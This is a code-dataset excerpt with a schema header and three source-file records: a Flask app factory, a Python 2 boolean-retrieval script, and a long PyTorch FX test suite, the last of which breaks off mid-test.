blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
04224bb729241e830197f141c5352092b82bd014 | 7ea93ebddf0eb742fd8d499d5bd9ce68bc5aadd5 | /app/__init__.py | 45ff7e8597f8c6e24fa86fb74eb0d3b98ae2f130 | [] | no_license | wma8/websitess | f41ebbaeb359ce40acce16b2ebdc976a57c39e6c | 76b82b61b34d6b5704920e05e017007a4166ec57 | refs/heads/master | 2023-02-09T09:18:43.321640 | 2019-06-26T11:06:55 | 2019-06-26T11:06:55 | 193,888,681 | 0 | 0 | null | 2023-02-02T06:32:51 | 2019-06-26T11:09:05 | Python | UTF-8 | Python | false | false | 479 | py | from flask_sqlalchemy import SQLAlchemy
from flask_bootstrap import Bootstrap
from config import config
from flask import Flask
import pymysql
pymysql.install_as_MySQLdb()
db = SQLAlchemy()
def create_app(config_name):
app = Flask(__name__)
Bootstrap(app)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
db.init_app(app)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
return app
| [
"wma8@ncsu.edu"
] | wma8@ncsu.edu |
62d8a1e1ebc3c8d291c1aac3ad32a57ed5088219 | 7ac1f3e38dab2899d6dc0d02cc1ace3934fb0805 | /IR/text codes/boolRet.txt | 3c3a38f9c6bb1ee3abedbd677eccc255f149a349 | [] | no_license | amanbhal/pythonCodes | 3fd9357211fe7d06c6972e7a4f469df1ff3cf60a | 49d17ce395d15e7c8497af8455790ecb876a0d49 | refs/heads/master | 2016-08-12T06:12:19.108863 | 2015-11-16T20:42:11 | 2015-11-16T20:42:11 | 46,301,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,699 | txt | #! /usr/bin/python
from helpers import getStopList, getFileList, growDict, printDict
def main():
stopLst = getStopList("../Files/")
[fList, tPath] = getFileList("../Files/","sampleDocs/")
tokDict = {}
for f in fList:
tokDict = growDict(tokDict, f, fList.index(f), tPath,\
stopLst, len(fList), 1)
query = queryInput()
#printDict(tokDict, 1)
print query
boolSearch(tokDict, query, fList)
def boolSearch(tokDict, query, fList):
qTokens = query.split()
qLen = len(qTokens)
res = []
count = 0
parRes = fList[:]
while True:
term = qTokens[count]
if not term in tokDict:
parRes = []
tempRes = parRes[:]
for f in parRes:
ind = fList.index(f)
if not tokDict[term][ind]:
tempRes.remove(f)
parRes = tempRes[:]
if count == (qLen - 1):
print parRes
res = list( set(res) | set(parRes) )
break
count += 1
op = qTokens[count]
count += 1
if op == 'or':
print parRes
res = list( set(res) | set(parRes) )
parRes = fList[:]
print sorted(res)
def queryInput():
cont = 1
query = ''
while cont != 3:
term = raw_input("Term\n-> ")
if ( not term.isalpha() ) and ( not term.isdigit() ):
continue
query += term
cont = raw_input("And : 1, Or : 2, End : 3\n-> ")
if int(cont) == 1:
query += ' and '
elif int(cont) == 2:
query += ' or '
else:
cont = int(cont)
return query
if __name__ == "__main__":
main()
| [
"amandeep.bhal92@gmail.com"
] | amandeep.bhal92@gmail.com |
46b4946ad12fe1760fc12c8f29ba67cd8fa9854e | 5349a469ac8913a64d101c3d65257b157c2bcf3c | /test/test_fx.py | 12ffad9a2b46c83e68f151d20e30c40f96bda265 | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | sarahannali/pytorch | 6c1ba901bd50bf7ac9b4e14cb9305da84f8bcb25 | 31ee5d8d8b249fd0dbd60e1d9c171ec75b597672 | refs/heads/master | 2023-01-01T11:01:44.907512 | 2020-10-12T23:55:46 | 2020-10-12T23:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,721 | py | import torch
import unittest
import operator
import numbers
import pickle
import copy
from pathlib import Path
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Tracer, Graph
from torch.fx.experimental import GraphManipulation
from torch.fx.experimental import shape_prop
from torch.fx.experimental.Partitioner import DAG, Partitioner
from torch.fx.experimental.subgraph_creation_example import split_module
from torch.fx.proxy import TraceError
from fx.quantization import Quantizer
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import run_tests, TEST_WITH_ROCM, IS_WINDOWS, IS_SANDCASTLE, IS_MACOS
from torch.testing._internal.jit_utils import JitTestCase
try:
from torchvision.models import resnet18
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
class TestFX(JitTestCase):
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint(gm)
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Any], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint(sym)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint(gm)
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
@skipIfNoTorchVision
def test_resnet(self):
resnet = resnet18()
resnet.train()
res_graph = symbolic_trace(resnet)
res_script = torch.jit.script(res_graph)
ip = torch.rand(1, 3, 224, 224)
a = resnet(ip)
b = res_graph(ip)
c = res_script(ip)
self.assertEqual(a, b)
self.assertEqual(a, c)
quantizer = Quantizer(res_graph)
for i in range(10):
quantizer.observe((torch.rand(1, 3, 224, 224),))
qgraph = quantizer.quantize()
qgraph.graph.lint(qgraph)
qgraph_script = torch.jit.script(qgraph)
d = qgraph(ip)
e = qgraph_script(ip)
assert (a - d).abs().max() < 2
self.assertEqual(d, e)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
torch_root = Path(__file__).resolve().parent.parent
p = torch_root / 'build' / 'lib' / 'libtorchbind_test.so'
torch.ops.load_library(str(p))
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.Tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint(wrapper)
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_allclose(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_allclose(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_allclose(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint(m_g)
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Any], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint(m)
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint(traced2)
traced2(torch.rand(4, 4))
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint(traced)
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint(traced)
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint(traced)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint(loaded)
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint(traced)
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint(transformed)
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint(traced)
copied = copy.deepcopy(traced)
copied.graph.lint(copied)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be unpacked as function argument'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be unpacked as function argument'):
symbolic_trace(ud)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint(gm)
out = gm(input)
self.assertEqual(out, ref_out)
def test_replace_target_nodes_with(self):
class testModule(torch.nn.Module):
def forward(self, a, b):
return a + b
m = testModule()
traced = symbolic_trace(m)
input1 = torch.randn(1)
input2 = torch.randn(1)
assert (input1 + input2) == traced(input1, input2)
GraphManipulation.replace_target_nodes_with(
fx_module=traced,
old_op="call_function",
old_target=operator.add,
new_op="call_function",
new_target=operator.mul,
)
assert (input1 * input2) == traced(input1, input2)
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint(traced)
printed = str(traced)
assert 'GraphModuleImpl()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint(traced)
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint(gm)
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint(gm)
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
message = "assert_foobar"
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch.Assert(x.shape[1] > 4, message)
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, message):
traced(torch.rand(4, 3))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = graph._nodes
nodes[2], nodes[3] = nodes[3], nodes[2]
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].shape
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_find_single_partition(self):
class testModule(torch.nn.Module):
def forward(self, a, b):
return a + b
m = testModule()
traced = symbolic_trace(m)
partitioner = Partitioner()
devices = [{"name": "dev_0", "available_mem": float('inf')}]
dag = partitioner.partition_graph(traced, devices)
for node in traced.graph.nodes:
assert node.op == 'output' or node.partition_ids == [1]
nodes = traced.graph.nodes
res_dag = DAG()
res_dag.create_node(0, [], [1], [], [])
res_dag.create_node(1, [0], [], [nodes[0], nodes[1]], [nodes[2]])
for r, d in zip(res_dag.nodes, dag.nodes):
assert(r.partition_id == d.partition_id)
assert(r.parents == d.parents)
assert(r.children == d.children)
assert(r.input_nodes == d.input_nodes)
assert(r.output_nodes == d.output_nodes)
def test_subgraph_creation(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x, y):
z = self.linear(x + self.param).clamp(min=0.0, max=1.0)
w = self.linear(y).clamp(min=0.0, max=1.0)
return z + w
# symbolically trace model
my_module = MyModule()
my_module_traced = symbolic_trace(my_module)
# random mod partitioning
partition_counter = 0
NPARTITIONS = 3
def mod_partition(node: Node):
nonlocal partition_counter
partition = partition_counter % NPARTITIONS
partition_counter = (partition_counter + 1) % NPARTITIONS
return partition
# split module in module with submodules
module_with_submodules = split_module(my_module_traced, my_module, mod_partition)
x = torch.rand(3, 4)
y = torch.rand(3, 4)
orig_out = my_module_traced(x, y)
submodules_out = module_with_submodules(x, y)
self.assertEqual(orig_out, submodules_out)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs
# Neg doesn't have in-place
kwargs.pop('inplace')
with torch.fx.graph.insert_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with torch.fx.graph.insert_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
graph.move_node_before(to_move=neg, before=b)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
